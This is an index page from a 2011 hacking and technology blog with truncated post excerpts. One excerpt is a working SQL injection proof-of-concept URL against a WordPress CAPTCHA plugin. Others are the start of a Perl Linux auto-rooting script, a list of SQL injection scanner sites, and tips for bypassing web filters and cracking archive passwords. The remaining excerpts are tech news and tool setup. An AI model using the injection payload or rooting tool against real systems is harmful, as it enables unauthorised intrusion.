Aug 28, 2011

WordPress Super CAPTCHA plugin 2.2.4 SQL Injection Vulnerability

# Exploit Title: WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability
# Date: 2011-08-26
# Software Link: http://downloads.wordpress.org/plugin/super-capcha.2.2.4.zip
# Version: 2.2.4 (tested)
# Notes: user has to be logged in as "admin" and magic_quotes has to be turned off

--- PoC ---
http://www.site.com/wp-admin/admin.php?page=super-captcha/Logs&markspam=-1' OR SLEEP(5)--%20

--------------- Vulnerable code ---------------
if(isset($_REQUEST['markspam']))   ...

Aug 27, 2011

Adding Google 1+ Button To Your Website / Blog

1 - Go here ==> http://www.google.com/webmasters/+1/button/
2 - Choose your Google 1+ button size and copy the code given in the box on the site
3 - Paste the code where you want the Google 1+ button to appear  ...

Link Building Explained in Simple

I was going through go4expert and found a very good article about Link Building, so I thought I would post it here. Links are the lifeline for a successful website. Links will generally take the users to the preferred web pages on visiting a website. These links will actually provide a roadmap of the website and its functionalities. Who should build text links? It is mandatory that every website owner should start...

Aug 22, 2011

Auto Rooter Beta 2011 Code

2011 Linux Auto r00t3r Beta version 1.0 works well on unpatched systems. It requires internet connectivity and is currently for local exploits only. It is a Perl script and is very easy to understand, modify and adapt to the required environment.

#!/usr/bin/perl
# Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################\n";
print "#             (Beta 1.0 )   Auto rooter by CrosS          ...

List of online SQLI scanners

http://www.be007.gigfa.com/scanner/scanner.php http://www.sunmagazin.com/tools/hack/SQLI-Scan http://scanner.drie88.tk http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan http://wolfscps.com/gscanner.php enjoy :) ...

Aug 15, 2011

Access Blocked Websites in Schools , Colleges and Offices

Hi friends. Today we will tell you how to access blocked websites. Websites like Facebook, Twitter and other social networking sites are generally blocked in schools, colleges and offices. There exist some tricks by which you can bypass the restrictions and access blocked sites; the most obvious is the use of proxies or anonymizer websites. But using proxies doesn’t always work, as they get blocked by the firewall as well. Here I am...

Cracking WinRAR Passwords | Recover WinRAR Passwords

WinRAR Password Cracker / Recover. Download Here. It uses a method called "brute force" to crack RAR passwords. It's easy to use; if anyone does not understand how to use it, feel free to ask. :) ...

Aug 14, 2011

Metasploit Cheat Sheet | Metasploit Commands

I was going through Metasploit: The Penetration Tester’s Guide by David Kennedy, Jim O’Gorman, Devon Kearns and Mati Aharoni. Guys, I must say it is worth reading. This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.

MSFconsole Commands

show exploits
Show all exploits within the Framework.

show payloads
Show all payloads within the Framework.

show...

Aug 10, 2011

Hacker Group Anonymous Aims to Destroy Facebook on Nov. 5: fact or rumour !!!

Hacktivist group Anonymous vows to "kill Facebook" on November 5, citing users' lack of choice in privacy as its reason for attack. The group of hackers has claimed participation in just about every recent notable hacking attack of this year and successfully broke into 70 law enforcement websites and took down the Syrian Ministry of Defense website this week alone. This recent interest in Facebook, despite a slew of privacy concerns raised against...

Citigroup hacked again - 92,000 customers info exposed from Japan

For the second time this year, Citigroup has suffered a major breach of its credit customers’ personal information; this time the breach involved 92,400 customers at its Japanese unit. Citigroup's Japanese credit card unit said personal information for more than 92,000 of its customers was illegally sold to a third party. The information exposed included the names, account numbers, addresses, phone numbers, birthdates, and sex of 92,408 credit card holders, Citi Cards Japan warned in an advisory (PDF) issued Friday. The personal identification numbers and card security codes were not accessed. Citi Cards Japan did not mention how customer...

Aug 9, 2011

Install Android Gingerbread 2.3 in Samsung Galaxy 5 [I5500/I5503] without rooting

Before going through this post, I suggest you read the previous post on the Froyo update for the Samsung Galaxy here. The Galaxy 5 I5500, also known as the Corby I5500, has been around in the Android world since June 2010. The phone is one of the lower-end, budget-friendly Android devices out there whose time is running out as new devices and ROMs arrive on the scene. However, XDA-Developers forum member subpsyke has recently ported the famous CyanogenMod...

Aug 7, 2011

Apple iCloud PRICING INFO

Apple iCloud pricing details revealed. 5GB of cloud storage will be free for users, and they have to pay between $20 and $100 a year for additional space. iCloud.com is open for developers now. Users can store videos, songs, pictures and other files for free up to 5GB. 10GB of additional space will cost $20 a year, 20GB will cost $40 and 50GB will cost $100 a year. In the UK, this pricing converts to £14 a year for 10GB of extra space, £28 for 20GB...

Aug 6, 2011

Increase Your Download Speed | Working Method With Pictures

The use of the terms uploading and downloading often implies that the data sent or received is to be stored permanently, or at least stored more than temporarily. In contrast, the term downloading is distinguished from the related concept of streaming, which indicates the receiving of data that is used near immediately as it is received, while the transmission is still in progress...

Spam King arrested for hacking 500,000 Facebook accounts

A notorious spammer known as the “Spam King” has surrendered to the FBI on charges of bombarding Facebook users with unwanted messages after breaching the security of 500,000 accounts. Sanford Wallace, 43, also known as "Spamford Wallace" and "David Frederix", was arrested in Las Vegas on Thursday. Wallace is accused of hacking into 500,000 accounts to harvest friend lists between November 2008...

Aug 5, 2011

Installing and Configuring Nessus on Backtrack

Download and install Nessus from its official website and then:

1) Get a free activation key from the Tenable/Nessus website
2) Enter the key using the nessus-fetch command
/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx
3) Create a user and password
/opt/nessus/sbin/nessus-adduser
4) Start the service
/etc/init.d/nessusd start
5) Start Nessus
https://localhost:88...

Backtrack - Linux Based Penetration Testing OS

BackTrack is the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless of whether you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every...
